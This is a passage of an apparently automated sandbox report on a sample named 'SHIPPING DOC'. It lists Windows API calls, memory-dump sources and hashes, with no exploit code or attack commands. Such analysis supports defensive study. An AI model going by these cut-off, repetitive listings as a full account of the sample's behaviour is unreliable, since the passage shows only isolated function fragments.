                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode$LabelVolume
                                                                                                                      • String ID: \VH
                                                                                                                      • API String ID: 2006950084-234962358
                                                                                                                      • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                                                                      • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                                                                                                                      • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                                                                      • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                      • GetMenuItemInfoW.USER32 ref: 00449727
                                                                                                                      • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                                                                                                                      • DrawMenuBar.USER32 ref: 00449761
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$InfoItem$Draw_malloc
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 772068139-4108050209
                                                                                                                      • Opcode ID: c51535a36009e0b84663db87369d5282580437b440f7bb88edfbca7c2865f555
                                                                                                                      • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                                                                                                                      • Opcode Fuzzy Hash: c51535a36009e0b84663db87369d5282580437b440f7bb88edfbca7c2865f555
                                                                                                                      • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcslen$_wcscpy
                                                                                                                      • String ID: 3, 3, 8, 1
                                                                                                                      • API String ID: 3469035223-357260408
                                                                                                                      • Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                                                                                      • Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
                                                                                                                      • Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                                                                                      • Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                                                                                                                      • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: ICMP.DLL$IcmpCloseHandle
                                                                                                                      • API String ID: 2574300362-3530519716
                                                                                                                      • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                                                                                      • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                                                                                                                      • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                                                                                      • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                                                                                                                      • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: ICMP.DLL$IcmpCreateFile
                                                                                                                      • API String ID: 2574300362-275556492
                                                                                                                      • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                                                                      • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                                                                                                                      • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                                                                      • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                                                                                                                      • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: ICMP.DLL$IcmpSendEcho
                                                                                                                      • API String ID: 2574300362-58917771
                                                                                                                      • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                                                                      • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                                                                                                                      • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                                                                      • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                                                                                                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                      • API String ID: 2574300362-4033151799
                                                                                                                      • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                                                                      • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                                                                                                                      • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                                                                      • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                                                                                                                      APIs
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 0047950F
                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                                                                                                                      • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00479650
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$AllocClearCopyInitString
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2808897238-0
                                                                                                                      • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                                                                      • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                                                                                                                      • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                                                                      • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                                                                                                                      • __itow.LIBCMT ref: 004699CD
                                                                                                                        • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                                                                                                                      • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                                                                                                                      • __itow.LIBCMT ref: 00469A97
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$__itow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3379773720-0
                                                                                                                      • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                                                                                      • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                                                                                                                      • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                                                                                      • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                                                                                                                      APIs
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00449A4A
                                                                                                                      • ScreenToClient.USER32(?,?), ref: 00449A80
                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$ClientMoveRectScreen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3880355969-0
                                                                                                                      • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                                                                      • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                                                                                                                      • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                                                                      • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2782032738-0
                                                                                                                      • Opcode ID: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                                                                                      • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                                                                                                                      • Opcode Fuzzy Hash: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                                                                                      • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                                                                                                                      APIs
                                                                                                                      • ClientToScreen.USER32(00000000,?), ref: 0044169A
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00441722
                                                                                                                      • PtInRect.USER32(?,?,?), ref: 00441734
                                                                                                                      • MessageBeep.USER32(00000000), ref: 004417AD
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1352109105-0
                                                                                                                      • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                                                                      • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                                                                                                                      • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                                                                      • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                                                                                                                      APIs
                                                                                                                      • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                                                                                                                      • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                                                                                                                      • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                                                                                                                      • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3321077145-0
                                                                                                                      • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                                                                      • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                                                                                                                      • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                                                                      • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                                                                                                                      APIs
                                                                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                                                                                                                      • __isleadbyte_l.LIBCMT ref: 004208A6
                                                                                                                      • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                                                                                                                      • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3058430110-0
                                                                                                                      • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                                                                                      • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                                                                                                                      • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                                                                                      • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                                                                                                                      APIs
                                                                                                                      • GetParent.USER32(?), ref: 004503C8
                                                                                                                      • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                                                                                                                      • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                                                                                                                      • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
